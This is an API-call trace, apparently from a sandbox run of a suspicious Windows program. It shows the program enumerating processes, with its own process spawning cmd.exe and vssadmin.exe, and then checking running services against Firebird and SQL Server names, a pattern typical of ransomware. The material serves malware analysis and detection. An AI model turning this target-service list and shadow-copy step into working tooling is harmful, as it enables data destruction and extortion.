	[0050.103] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crafts-distinct.exe")) returned 1
	[0050.103] lstrlenW (lpString="crafts-distinct.exe") returned 19
	[0050.103] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sophisticated.exe")) returned 1
	[0050.104] lstrlenW (lpString="sophisticated.exe") returned 17
	[0050.104] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist.exe")) returned 1
	[0050.104] lstrlenW (lpString="wishlist.exe") returned 12
	[0050.104] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="top.exe")) returned 1
	[0050.104] lstrlenW (lpString="top.exe") returned 7
	[0050.105] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="implemented.exe")) returned 1
	[0050.105] lstrlenW (lpString="implemented.exe") returned 15
	[0050.105] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="comp.exe")) returned 1
	[0050.105] lstrlenW (lpString="comp.exe") returned 8
	[0050.105] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="synthetic_memphis.exe")) returned 1
	[0050.106] lstrlenW (lpString="synthetic_memphis.exe") returned 21
	[0050.106] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solved.exe")) returned 1
	[0050.106] lstrlenW (lpString="solved.exe") returned 10
	[0050.106] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bosnia resolution.exe")) returned 1
	[0050.107] lstrlenW (lpString="bosnia resolution.exe") returned 21
	[0050.107] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trips.exe")) returned 1
	[0050.107] lstrlenW (lpString="trips.exe") returned 9
	[0050.107] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tumormanual.exe")) returned 1
	[0050.108] lstrlenW (lpString="tumormanual.exe") returned 15
	[0050.108] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecom.exe")) returned 1
	[0050.108] lstrlenW (lpString="telecom.exe") returned 11
	[0050.108] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="realistic.exe")) returned 1
	[0050.109] lstrlenW (lpString="realistic.exe") returned 13
	[0050.109] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0050.109] lstrlenW (lpString="WmiPrvSE.exe") returned 12
	[0050.109] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0050.110] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0050.110] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0050.110] lstrlenW (lpString="cmd.exe") returned 7
	[0050.110] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0050.111] lstrlenW (lpString="conhost.exe") returned 11
	[0050.111] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0050.111] lstrlenW (lpString="vssadmin.exe") returned 12
	[0050.111] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1
	[0050.112] lstrlenW (lpString="VSSVC.exe") returned 9
	[0050.112] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0050.112] lstrlenW (lpString="svchost.exe") returned 11
	[0050.112] Process32NextW (in: hSnapshot=0x184, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0050.113] CloseHandle (hObject=0x184) returned 1
	[0050.113] Sleep (dwMilliseconds=0x1f4) 
	[0050.785] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7e0fcc0
	[0050.786] EnumServicesStatusExW (in: hSCManager=0x7e0fcc0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 0
	[0050.786] GetLastError () returned 0xea
	[0050.786] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x12c6) returned 0xb4b70c0
	[0050.786] EnumServicesStatusExW (in: hSCManager=0x7e0fcc0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb4b70c0, cbBufSize=0x12c6, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb4b70c0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 1
	[0050.787] CloseServiceHandle (hSCObject=0x7e0fcc0) returned 1
	[0050.787] lstrlenW (lpString="Appinfo") returned 7
	[0050.787] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0050.787] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0050.787] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0050.787] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0050.787] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0050.787] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0050.787] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0050.787] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0050.787] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0050.787] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0050.787] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0050.787] lstrlenW (lpString="AudioSrv") returned 8
	[0050.787] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0050.787] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0050.787] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0050.788] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0050.788] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0050.788] lstrlenW (lpString="BFE") returned 3
	[0050.788] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0050.788] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0050.788] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0050.789] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0050.789] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0050.789] lstrlenW (lpString="CryptSvc") returned 8
	[0050.789] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0050.789] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0050.789] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0050.789] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0050.789] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0050.789] lstrlenW (lpString="CscService") returned 10
	[0050.789] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0050.789] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0050.789] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0050.789] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0050.789] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0050.789] lstrlenW (lpString="DcomLaunch") returned 10
	[0050.789] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0050.789] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0050.789] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0050.789] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0050.789] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0050.789] lstrlenW (lpString="Dhcp") returned 4
	[0050.789] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0050.789] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0050.790] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0050.790] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0050.790] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0050.790] lstrlenW (lpString="Dnscache") returned 8
	[0050.790] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0050.790] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0050.790] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0050.790] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0050.790] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0050.790] lstrlenW (lpString="DPS") returned 3
	[0050.790] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0050.790] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0050.790] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0050.790] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0050.790] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0050.790] lstrlenW (lpString="eventlog") returned 8
	[0050.790] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0050.790] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0050.790] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0050.790] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0050.790] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0050.790] lstrlenW (lpString="EventSystem") returned 11
	[0050.790] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0050.790] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0050.790] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0050.790] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0050.790] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0050.791] lstrlenW (lpString="gpsvc") returned 5
	[0050.791] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0050.791] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0050.791] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0050.791] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0050.791] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0050.791] lstrlenW (lpString="iphlpsvc") returned 8
	[0050.791] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0050.791] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0050.791] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0050.791] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0050.791] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0050.791] lstrlenW (lpString="LanmanServer") returned 12
	[0050.791] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0050.791] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0050.791] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0050.791] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0050.791] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0050.791] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0050.791] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0050.791] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0050.791] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0050.791] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0050.791] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0050.791] lstrlenW (lpString="lmhosts") returned 7
	[0050.791] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0050.791] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0050.791] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0050.791] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0050.791] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0050.791] lstrlenW (lpString="MMCSS") returned 5
	[0050.791] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0050.791] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0050.791] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0050.791] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0050.792] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0050.792] lstrlenW (lpString="MpsSvc") returned 6
	[0050.792] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0050.792] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0050.792] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0050.792] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0050.792] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0050.792] lstrlenW (lpString="Netman") returned 6
	[0050.792] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0050.792] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0050.792] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0050.792] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0050.792] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0050.792] lstrlenW (lpString="netprofm") returned 8
	[0050.792] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0050.792] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0050.792] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0050.792] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0050.792] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0050.792] lstrlenW (lpString="NlaSvc") returned 6
	[0050.792] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0050.792] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0050.792] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0050.792] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0050.792] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0050.792] lstrlenW (lpString="nsi") returned 3
	[0050.792] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0050.792] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0050.792] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0050.792] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0050.792] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0050.792] lstrlenW (lpString="PcaSvc") returned 6
	[0050.792] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0050.792] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0050.792] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0050.793] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0050.793] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0050.793] lstrlenW (lpString="PlugPlay") returned 8
	[0050.793] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0050.793] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0050.793] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0050.793] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0050.793] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0050.793] lstrlenW (lpString="Power") returned 5
	[0050.793] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0050.793] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0050.793] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0050.793] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0050.793] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0050.793] lstrlenW (lpString="ProfSvc") returned 7
	[0050.793] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0050.793] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0050.793] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0050.793] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0050.793] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0050.793] lstrlenW (lpString="RpcEptMapper") returned 12
	[0050.793] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0050.793] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0050.793] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0050.793] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0050.793] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0050.793] lstrlenW (lpString="RpcSs") returned 5
	[0050.793] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0050.793] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0050.793] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0050.793] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0050.793] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0050.793] lstrlenW (lpString="SamSs") returned 5
	[0050.793] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0050.793] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0050.794] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0050.794] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0050.794] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0050.794] lstrlenW (lpString="Schedule") returned 8
	[0050.794] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0050.794] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0050.794] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0050.794] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0050.794] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0050.794] lstrlenW (lpString="SENS") returned 4
	[0050.794] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0050.794] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0050.794] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0050.794] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0050.794] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0050.794] lstrlenW (lpString="ShellHWDetection") returned 16
	[0050.794] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0050.794] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0050.794] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0050.794] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0050.794] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0050.794] lstrlenW (lpString="Spooler") returned 7
	[0050.794] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0050.794] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0050.794] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0050.794] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0050.794] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0050.794] lstrlenW (lpString="swprv") returned 5
	[0050.794] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1
	[0050.794] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1
	[0050.794] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1
	[0050.794] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1
	[0050.794] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1
	[0050.794] lstrlenW (lpString="SysMain") returned 7
	[0050.795] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0050.795] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0050.795] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0050.795] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0050.795] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0050.795] lstrlenW (lpString="Themes") returned 6
	[0050.795] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0050.795] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0050.795] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
